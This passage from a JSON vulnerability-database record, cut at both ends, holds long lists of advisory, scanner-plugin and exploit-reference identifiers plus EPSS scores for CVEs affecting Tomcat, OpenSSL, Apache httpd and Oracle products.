"REDHAT-RHSA-2017-3477.NASL", "REDHAT-RHSA-2018-0268.NASL", "REDHAT-RHSA-2018-0270.NASL", "REDHAT-RHSA-2018-0275.NASL", "REDHAT-RHSA-2018-0466.NASL", "REDHAT-RHSA-2018-2185.NASL", "REDHAT-RHSA-2018-2186.NASL", "REDHAT-RHSA-2018-2568.NASL", "REDHAT-RHSA-2018-2575.NASL", "REDHAT-RHSA-2018-2713.NASL", "REDHAT-RHSA-2020-4274.NASL", "SECURITYCENTER_5_4_3_TNS_2017_04.NASL", "SECURITYCENTER_OPENSSL_1_0_1U.NASL", "SECURITYCENTER_OPENSSL_1_0_2K.NASL", "SLACKWARE_SSA_2016-124-01.NASL", "SLACKWARE_SSA_2016-266-01.NASL", "SLACKWARE_SSA_2017-041-02.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20151221_JAKARTA_COMMONS_COLLECTIONS_ON_SL5_X.NASL", "SL_20160509_OPENSSL_ON_SL7_X.NASL", "SL_20160510_OPENSSL_ON_SL6_X.NASL", "SL_20160927_OPENSSL_ON_SL6_X.NASL", "SL_20170807_LOG4J_ON_SL7_X.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SL_20171019_HTTPD_ON_SL6_X.NASL", "SL_20171030_TOMCAT6_ON_SL6_X.NASL", "SL_20171030_TOMCAT_ON_SL7_X.NASL", "SOLARIS10_142824-29.NASL", "SPLUNK_642.NASL", "SUSE_SU-2016-1228-1.NASL", "SUSE_SU-2016-1233-1.NASL", "SUSE_SU-2016-2387-1.NASL", "SUSE_SU-2016-2394-1.NASL", "SUSE_SU-2016-2458-1.NASL", "SUSE_SU-2016-2468-1.NASL", "SUSE_SU-2017-0431-1.NASL", "SUSE_SU-2017-0441-1.NASL", "SUSE_SU-2017-0855-1.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "SUSE_SU-2017-2756-1.NASL", "SUSE_SU-2017-2907-1.NASL", "SUSE_SU-2017-3343-1.NASL", "SUSE_SU-2018-2839-1.NASL", "SUSE_SU-2018-2839-2.NASL", "SUSE_SU-2018-3082-1.NASL", "SUSE_SU-2021-14705-1.NASL", "TOMCAT_6_0_24.NASL", "TOMCAT_7_0_81.NASL", "TOMCAT_7_0_82.NASL", "TOMCAT_8_0_47.NASL", "TOMCAT_8_5_23.NASL", "TOMCAT_9_0_1.NASL", "TOMCAT_PUT_JSP.NASL", "UBUNTU_USN-2959-1.NASL", "UBUNTU_USN-3087-1.NASL", "UBUNTU_USN-3087-2.NASL", "UBUNTU_USN-3181-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3665-1.NASL", "UBUNTU_USN-3727-1.NASL", "VIRTUALBOX_5_0_22.NASL", "VIRTUOZZO_VZLSA-2017-2972.NASL", "VIRTUOZZO_VZLSA-2017-3080.NASL", "VMWARE_ESXI_6_0_BUILD_5485776_REMOTE.NASL", "WEBSPHERE_711865.NASL", "WEB_APPLICATION_SCANNING_112294", "WEB_APPLICATION_SCANNING_112300", "WEB_APPLICATION_SCANNING_112309", "WEB_APPLICATION_SCANNING_112310"]}, {"type": "nodejsblog", "idList": ["NODEJSBLOG:OPENSSL-JANUARY-2017", "NODEJSBLOG:OPENSSL-MAY-2016", "NODEJSBLOG:SEPTEMBER-2016-SECURITY-RELEASES"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2016-2107", "OPENSSL:CVE-2016-2179", "OPENSSL:CVE-2017-3732", "OPENSSL:CVE-2017-3738"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105732", "OPENVAS:1361412562310105828", "OPENVAS:1361412562310106262", "OPENVAS:1361412562310106267", "OPENVAS:1361412562310106356", "OPENVAS:1361412562310106390", "OPENVAS:1361412562310106949", "OPENVAS:1361412562310107048", "OPENVAS:1361412562310107049", "OPENVAS:1361412562310107141", "OPENVAS:1361412562310108252", "OPENVAS:1361412562310108772", "OPENVAS:1361412562310112048", "OPENVAS:1361412562310120608", "OPENVAS:1361412562310120684", "OPENVAS:1361412562310120744", "OPENVAS:1361412562310122791", "OPENVAS:1361412562310122792", "OPENVAS:1361412562310122924", "OPENVAS:1361412562310131170", "OPENVAS:1361412562310131177", "OPENVAS:1361412562310131285", "OPENVAS:1361412562310140019", "OPENVAS:1361412562310140047", "OPENVAS:1361412562310140168", "OPENVAS:1361412562310141826", "OPENVAS:1361412562310143949", "OPENVAS:1361412562310703417", "OPENVAS:1361412562310703566", "OPENVAS:1361412562310703673", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310807351", "OPENVAS:1361412562310807569", "OPENVAS:1361412562310807570", "OPENVAS:1361412562310807997", "OPENVAS:1361412562310808016", "OPENVAS:1361412562310808029", "OPENVAS:1361412562310808374", "OPENVAS:1361412562310808407", "OPENVAS:1361412562310808523", "OPENVAS:1361412562310808530", "OPENVAS:1361412562310808538", "OPENVAS:1361412562310809417", "OPENVAS:1361412562310809478", "OPENVAS:1361412562310809955", "OPENVAS:1361412562310810227", "OPENVAS:1361412562310810542", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811440", "OPENVAS:1361412562310811441", "OPENVAS:1361412562310811854", "OPENVAS:1361412562310812035", "OPENVAS:1361412562310812045", "OPENVAS:1361412562310812057", "OPENVAS:1361412562310812058", "OPENVAS:1361412562310812401", "OPENVAS:1361412562310812959", "OPENVAS:1361412562310812960", "OPENVAS:1361412562310814409", "OPENVAS:1361412562310842729", "OPENVAS:1361412562310842896", "OPENVAS:1361412562310842898", "OPENVAS:1361412562310843029", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843539", "OPENVAS:1361412562310843603", "OPENVAS:1361412562310851127", "OPENVAS:1361412562310851289", "OPENVAS:1361412562310851295", "OPENVAS:1361412562310851297", "OPENVAS:1361412562310851299", "OPENVAS:1361412562310851337", "OPENVAS:1361412562310851397", "OPENVAS:1361412562310851399", "OPENVAS:1361412562310851412", "OPENVAS:1361412562310851651", "OPENVAS:1361412562310851665", "OPENVAS:1361412562310851703", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310871511", "OPENVAS:1361412562310871512", "OPENVAS:1361412562310871529", "OPENVAS:1361412562310871610", "OPENVAS:1361412562310871614", "OPENVAS:1361412562310871663", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310871989", "OPENVAS:1361412562310872342", "OPENVAS:1361412562310872359", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", "OPENVAS:1361412562310872759", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310873711", "OPENVAS:1361412562310873766", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310882333", "OPENVAS:1361412562310882486", "OPENVAS:1361412562310882566", "OPENVAS:1361412562310882569", "OPENVAS:1361412562310882784", "OPENVAS:1361412562310882791", "OPENVAS:1361412562310882795", "OPENVAS:1361412562310882796", "OPENVAS:1361412562310891102", "OPENVAS:1361412562311220161047", "OPENVAS:1361412562311220171213", "OPENVAS:1361412562311220171214", "OPENVAS:1361412562311220171252", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562311220171261", "OPENVAS:1361412562311220171262", "OPENVAS:1361412562311220191389", "OPENVAS:1361412562311220191419", "OPENVAS:1361412562311220201420", "OPENVAS:1361412562311220201637", "OPENVAS:703417", "OPENVAS:703566", "OPENVAS:703673"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2018", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2017", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2020", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2016-0722", "ELSA-2016-0996", "ELSA-2016-1940", "ELSA-2016-3556", "ELSA-2016-3558", "ELSA-2016-3571", "ELSA-2016-3621", "ELSA-2017-2423", "ELSA-2017-2882", "ELSA-2017-2972", "ELSA-2017-3080", "ELSA-2017-3081", "ELSA-2019-4581", "ELSA-2019-4747", "ELSA-2021-9150", "ELSA-2022-9419"]}, {"type": "osv", "idList": ["OSV:CVE-2016-2107", "OSV:CVE-2016-2179", "OSV:DLA-1102-1", "OSV:DLA-1166-1", "OSV:DLA-361-1", "OSV:DLA-456-1", "OSV:DLA-637-1", "OSV:DSA-3417-1", "OSV:DSA-3566-1", "OSV:DSA-3673-1", "OSV:DSA-3673-2", "OSV:DSA-3980-1", "OSV:GHSA-4MV7-CQ75-3QJM", "OSV:GHSA-5GGR-MPGW-3MGX", "OSV:GHSA-FJQ5-5J5F-MVXH", "OSV:GHSA-FXPH-Q3J8-MV87", "OSV:GHSA-XJGH-84HX-56C5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143369", "PACKETSTORM:144557", "PACKETSTORM:144591", "PACKETSTORM:145966"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0020", "PAN-SA-2016-0023"]}, {"type": "photon", "idList": ["PHSA-2017-0077", "PHSA-2017-0078"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2501", "RHSA-2015:2502", "RHSA-2015:2514", "RHSA-2015:2516", "RHSA-2015:2517", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2524", "RHSA-2015:2534", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2537", "RHSA-2015:2538", "RHSA-2015:2539", "RHSA-2015:2540", "RHSA-2015:2542", "RHSA-2015:2547", "RHSA-2015:2556", "RHSA-2015:2557", "RHSA-2015:2559", "RHSA-2015:2560", "RHSA-2015:2578", "RHSA-2015:2579", "RHSA-2015:2670", "RHSA-2015:2671", "RHSA-2016:0040", "RHSA-2016:0118", "RHSA-2016:0722", "RHSA-2016:0996", "RHSA-2016:1773", "RHSA-2016:1940", "RHSA-2016:2035", "RHSA-2016:2036", "RHSA-2016:2073", "RHSA-2016:2957", "RHSA-2017:1417", "RHSA-2017:1801", "RHSA-2017:1802", "RHSA-2017:2423", "RHSA-2017:2633", "RHSA-2017:2635", "RHSA-2017:2636", "RHSA-2017:2637", "RHSA-2017:2638", "RHSA-2017:2808", "RHSA-2017:2809", "RHSA-2017:2810", "RHSA-2017:2811", "RHSA-2017:2882", "RHSA-2017:2888", "RHSA-2017:2889", "RHSA-2017:2972", "RHSA-2017:3018", "RHSA-2017:3080", "RHSA-2017:3081", "RHSA-2017:3113", "RHSA-2017:3114", "RHSA-2017:3193", "RHSA-2017:3194", "RHSA-2017:3195", "RHSA-2017:3239", "RHSA-2017:3240", "RHSA-2017:3244", "RHSA-2017:3399", "RHSA-2017:3400", "RHSA-2017:3475", "RHSA-2017:3476", "RHSA-2017:3477", "RHSA-2018:0268", "RHSA-2018:0269", "RHSA-2018:0270", "RHSA-2018:0271", "RHSA-2018:0275", "RHSA-2018:0465", "RHSA-2018:0466", "RHSA-2018:2185", "RHSA-2018:2186", "RHSA-2018:2187", "RHSA-2018:2568", "RHSA-2018:2575", "RHSA-2018:2713", "RHSA-2018:2939", "RHSA-2019:1545", "RHSA-2020:4274", "RHSA-2021:3140"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-1182", "RH:CVE-2016-2107", "RH:CVE-2016-2179", "RH:CVE-2017-12617", "RH:CVE-2017-3738", "RH:CVE-2017-5645", "RH:CVE-2017-9798", "RH:CVE-2019-17571"]}, {"type": "seebug", "idList": ["SSV:89999", "SSV:91448", "SSV:92965", "SSV:96537", "SSV:96624"]}, {"type": "slackware", "idList": ["SSA-2016-124-01", "SSA-2016-266-01", "SSA-2017-041-02", "SSA-2017-261-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:1911-1", "OPENSUSE-SU-2016:1237-1", "OPENSUSE-SU-2016:1238-1", "OPENSUSE-SU-2016:1240-1", "OPENSUSE-SU-2016:1243-1", "OPENSUSE-SU-2016:1566-1", "OPENSUSE-SU-2016:2391-1", "OPENSUSE-SU-2016:2407-1", "OPENSUSE-SU-2016:2537-1", "OPENSUSE-SU-2017:3069-1", "OPENSUSE-SU-2017:3345-1", "OPENSUSE-SU-2018:0458-1", "OPENSUSE-SU-2018:1057-1", "SUSE-SU-2016:1206-1", "SUSE-SU-2016:1228-1", "SUSE-SU-2016:1233-1", "SUSE-SU-2016:2387-1", "SUSE-SU-2016:2394-1", "SUSE-SU-2016:2458-1", "SUSE-SU-2016:2468-1", "SUSE-SU-2016:2469-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1", "SUSE-SU-2017:2701-1", "SUSE-SU-2017:3039-1", "SUSE-SU-2017:3059-1", "SUSE-SU-2017:3279-1", "SUSE-SU-2017:3343-1"]}, {"type": "symantec", "idList": ["SMNTC-1363", "SMNTC-1382", "SMNTC-1395", "SMNTC-1419", "SMNTC-1457", "SMNTC-97702"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:7CACCDBBDB47286572F59C67E92AF821", "THN:96A25F981DD18505C101D0FC9DAA7B30"]}, {"type": "threatpost", "idList": ["THREATPOST:C67169E038FB8F98C9DE037029EB7D5A", "THREATPOST:CF8A831748EC23AA2B67F64081A55155"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C", "TOMCAT:5322371A63B432FEA04126BDF7D1223B", "TOMCAT:A7D3DCFDE9F8C13D1A85F195595ACE5C", "TOMCAT:D72CBF1EC8D17C51BF9944C1A031DFF0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-2959-1", "USN-3087-1", "USN-3087-2", "USN-3181-1", "USN-3425-1", "USN-3425-2", "USN-3665-1", "USN-3727-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2015-7501", "UB:CVE-2015-7940", "UB:CVE-2016-1182", "UB:CVE-2016-2107", "UB:CVE-2016-2179", "UB:CVE-2017-12616", "UB:CVE-2017-12617", "UB:CVE-2017-3732", "UB:CVE-2017-3738", "UB:CVE-2017-5645", "UB:CVE-2017-9798"]}, {"type": "veracode", "idList": ["VERACODE:11857", "VERACODE:12485", "VERACODE:12689", "VERACODE:13434", "VERACODE:1847", "VERACODE:3347", "VERACODE:3426", "VERACODE:3670", "VERACODE:3919", "VERACODE:5354"]}, {"type": "zdt", "idList": ["1337DAY-ID-25990", "1337DAY-ID-28573", "1337DAY-ID-28759", "1337DAY-ID-28780", "1337DAY-ID-29579"]}]}, "score": {"value": 8.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-896", "ALAS-2017-913"]}, {"type": "apple", "idList": ["APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:HT208331"]}, {"type": "archlinux", "idList": ["ASA-201709-15"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-64394", "ATLASSIAN:JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "canvas", "idList": ["NSS"]}, {"type": "centos", "idList": ["CESA-2017:2423", "CESA-2017:2882", "CESA-2017:2972", "CESA-2017:3080", "CESA-2017:3081"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0774", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-0896"]}, {"type": "cisa", "idList": ["CISA:6A3DB540F84D34B9BB99751624D91DB9"]}, {"type": "cisco", "idList": ["CISCO-SA-20170130-OPENSSL"]}, {"type": "citrix", "idList": ["CTX233832"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:F006390335E44CFEC69607A8E9BE3B62"]}, {"type": "cve", "idList": ["CVE-2015-7940", "CVE-2016-1182", "CVE-2016-2107", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-5645", "CVE-2017-9798"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DSA-3980-1:C7ED3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5645", "DEBIANCVE:CVE-2017-9798"]}, {"type": "dsquare", "idList": ["E-627"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745", "EDB-ID:42953", "EDB-ID:42966", "EDB-ID:43008"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K23173103", "F5:K53173544", "F5:K70084351", "SOL07538415"]}, {"type": "fedora", "idList": ["FEDORA:092E9605F081", "FEDORA:0AC1C60C76B5", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:58BAF60A0C7C", "FEDORA:63AEC601CFBA", "FEDORA:76CFD605E21F", "FEDORA:A7FE360648D0", "FEDORA:A9847604E850", "FEDORA:A99066078F69", "FEDORA:DB25A6083B5B", "FEDORA:E150A6395ADF", "FEDORA:EFDAB6050C3B"]}, {"type": "fortinet", "idList": ["FG-IR-17-251"]}, {"type": "freebsd", "idList": ["01D729CA-1143-11E6-B55E-B499BAEBFEAF", "76B085E2-9D33-11E7-9260-000C292EE6B8", "C0DAE634-4820-4505-850D-B1C975D0F67D"]}, {"type": "gentoo", "idList": ["GLSA-201710-32"]}, {"type": "github", "idList": ["GHSA-FXPH-Q3J8-MV87"]}, {"type": "githubexploit", "idList": ["C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:269568"]}, {"type": "httpd", "idList": ["HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170503-01-OPENSSL"]}, {"type": "ibm", "idList": ["1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "4278728D85C79F2084FC36711DAAF10C86E475C8E6940F2111DD155F1C48C0FA", "59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "6F2C088BF5D78FB804760981ACFE38C9CC104BC5F9390812E5D324682512AD45", "79C9308A38227EABEE316B0407CBC46021561F829AEBF9659F93085D4FC63547", "7E4E851053AF5C2BFADF66AC8494971BF986538EB9E1BEE4C5D8B83D2DB1BBB0", "8451DCEAC7362310C8EAA923574AFEAD09CA58D139A870AE0ED1E3D11764573B", "9CCEB90B89301ED91DF7A501EF3103FD54D3AD611D342CF6E4B19E5105E84E35", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "F0864C914EFB62F7C48822F52BDF423B57466738327736DD211AEFBE34B7C109", "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4", "F7862E3AFF4165C1E96904B0CC478B568FD7C29638F30D7255C5D201546C0450", "F96732014CC74E0CD212E2641AC086C0DBA609B9E2E61E3DC4259C4E401BE0FA", "FAA2B691DD1E76E786CADE53CD8A2391FDC6BE6F5B14624181F6008CE76C4E36", "FC2A12A3D5CDFFAEF50A77215E69039CD0E678811823B3B21F6B390DAB68C2C0"]}, {"type": "ics", "idList": ["ICSMA-20-184-01"]}, {"type": "kaspersky", "idList": ["KLA11118"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED", "MSF:EXPLOIT/MULTI/HTTP/TOMCAT_JSP_UPLOAD_BYPASS"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785372", "MYHACK58:62201785395"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-695.NASL", "ALA_ALAS-2017-896.NASL", "ALA_ALAS-2017-913.NASL", "CENTOS_RHSA-2017-2423.NASL", "CENTOS_RHSA-2017-2882.NASL", "CENTOS_RHSA-2017-2972.NASL", "CENTOS_RHSA-2017-3080.NASL", "CENTOS_RHSA-2017-3081.NASL", "CITRIX_XENSERVER_CTX212736.NASL", "DEBIAN_DLA-1102.NASL", "DEBIAN_DLA-456.NASL", "DEBIAN_DSA-3566.NASL", "DEBIAN_DSA-3980.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "FEDORA_2016-05C567DF1A.NASL", "FEDORA_2016-1411324654.NASL", "FEDORA_2016-1E39D934ED.NASL", "FEDORA_2016-21BD6A33AF.NASL", "FEDORA_2016-D717FDCF74.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-A52F252521.NASL", "FEDORA_2017-B8358CDA24.NASL", "FREEBSD_PKG_01D729CA114311E6B55EB499BAEBFEAF.NASL", "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "FREEBSD_PKG_C0DAE63448204505850DB1C975D0F67D.NASL", "GENTOO_GLSA-201710-32.NASL", "MYSQL_ENTERPRISE_MONITOR_4_0_2_5168.NASL", "OPENSUSE-2016-561.NASL", "OPENSUSE-2016-562.NASL", "OPENSUSE-2016-564.NASL", "OPENSUSE-2017-1083.NASL", "OPENSUSE-2018-389.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLELINUX_ELSA-2017-2972.NASL", "ORACLELINUX_ELSA-2017-3080.NASL", "ORACLELINUX_ELSA-2017-3081.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2017-2972.NASL", "REDHAT-RHSA-2017-3080.NASL", "REDHAT-RHSA-2017-3081.NASL", "REDHAT-RHSA-2018-0275.NASL", "SLACKWARE_SSA_2016-124-01.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SL_20171019_HTTPD_ON_SL6_X.NASL", "SL_20171030_TOMCAT6_ON_SL6_X.NASL", "SL_20171030_TOMCAT_ON_SL7_X.NASL", "SUSE_SU-2016-1228-1.NASL", "SUSE_SU-2016-1233-1.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "SUSE_SU-2017-2756-1.NASL", "UBUNTU_USN-2959-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3665-1.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2016-2107"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108252", "OPENVAS:1361412562310140168", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310810542", "OPENVAS:1361412562310811854", "OPENVAS:1361412562310812035", "OPENVAS:1361412562310812045", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843603", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", "OPENVAS:1361412562310872759", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310882486", "OPENVAS:1361412562310882784", "OPENVAS:1361412562310882791", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562311220171261", "OPENVAS:703417"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018", "ORACLE:CPUOCT2019-5072832"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2017-2882", "ELSA-2017-2972", "ELSA-2017-3080", "ELSA-2017-3081"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144557", "PACKETSTORM:144591"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0023"]}, {"type": "photon", "idList": ["PHSA-2017-0077"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2671", "RHSA-2017:2810", "RHSA-2017:2882", "RHSA-2018:0269", "RHSA-2018:0271", "RHSA-2018:2568"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-12617", "RH:CVE-2017-5645"]}, {"type": "seebug", "idList": ["SSV:92965", "SSV:96537"]}, {"type": "slackware", "idList": ["SSA-2017-261-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1237-1", "OPENSUSE-SU-2016:1238-1", "OPENSUSE-SU-2016:1240-1", "OPENSUSE-SU-2016:1243-1", "OPENSUSE-SU-2018:1057-1", "SUSE-SU-2016:1206-1", "SUSE-SU-2016:1228-1", "SUSE-SU-2016:1233-1"]}, {"type": "symantec", "idList": ["SMNTC-1395", "SMNTC-1419", "SMNTC-1457"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:96A25F981DD18505C101D0FC9DAA7B30"]}, {"type": "threatpost", "idList": ["THREATPOST:CF8A831748EC23AA2B67F64081A55155"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-3425-1", "USN-3425-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12617", "UB:CVE-2017-5645", "UB:CVE-2017-9798"]}, {"type": "zdt", "idList": ["1337DAY-ID-28573", "1337DAY-ID-28780", "1337DAY-ID-29579"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-7501", "epss": 0.01145, "percentile": 0.82664, "modified": "2023-05-06"}, {"cve": "CVE-2015-7940", "epss": 0.0026, "percentile": 0.62236, "modified": "2023-05-06"}, {"cve": "CVE-2016-0635", "epss": 0.00286, "percentile": 0.64088, "modified": "2023-05-06"}, {"cve": "CVE-2016-1182", "epss": 0.33413, "percentile": 0.96423, "modified": "2023-05-06"}, {"cve": "CVE-2016-2107", "epss": 0.97395, "percentile": 0.99855, "modified": "2023-05-06"}, {"cve": "CVE-2016-2179", "epss": 0.02262, "percentile": 0.87936, "modified": "2023-05-06"}, {"cve": "CVE-2017-10068", "epss": 0.0023, "percentile": 0.59658, "modified": "2023-05-06"}, {"cve": "CVE-2017-10262", "epss": 0.00254, "percentile": 0.61724, "modified": "2023-05-06"}, {"cve": "CVE-2017-10273", "epss": 0.00069, "percentile": 0.28222, "modified": "2023-05-06"}, {"cve": "CVE-2017-10352", "epss": 0.00118, "percentile": 0.44466, "modified": "2023-05-06"}, {"cve": "CVE-2017-12617", "epss": 0.97502, "percentile": 0.99961, "modified": "2023-05-06"}, {"cve": "CVE-2017-3732", "epss": 0.00818, "percentile": 0.79417, "modified": "2023-05-06"}, {"cve": "CVE-2017-5645", "epss": 0.02224, "percentile": 0.87824, "modified": "2023-05-06"}, {"cve": "CVE-2017-9798", "epss": 0.97464, "percentile": 0.99926, "modified": "2023-05-06"}, {"cve": "CVE-2018-2561", "epss": 0.00207, "percentile": 0.57184, "modified": "2023-05-06"}, {"cve": "CVE-2018-2564", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2584", "epss": 0.0009, "percentile": 0.36955, "modified": "2023-05-06"}, {"cve": "CVE-2018-2594", "epss": 0.00092, "percentile": 0.38144, "modified": "2023-05-06"}, {"cve": "CVE-2018-2595", "epss": 0.00092, "percentile": 0.38144, "modified": "2023-05-06"}, {"cve": "CVE-2018-2596", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2601", "epss": 0.00127, "percentile": 0.45908, "modified": "2023-05-06"}, {"cve": "CVE-2018-2610", "epss": 0.00204, "percentile": 0.56947, "modified": "2023-05-06"}, {"cve": "CVE-2018-2625", "epss": 0.00319, "percentile": 0.66076, "modified": "2023-05-06"}, {"cve": "CVE-2018-2711", "epss": 0.0023, "percentile": 0.59658, "modified": "2023-05-06"}, {"cve": "CVE-2018-2713", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2715", "epss": 0.00124, "percentile": 0.45435, "modified": "2023-05-06"}, {"cve": "CVE-2018-2733", "epss": 0.00159, "percentile": 0.51004, "modified": "2023-05-06"}], "vulnersScore": 8.0}, "_state": {"dependencies": 1684433660, "score": 1684435403, "epss": 0}, "_internal": {"score_hash": 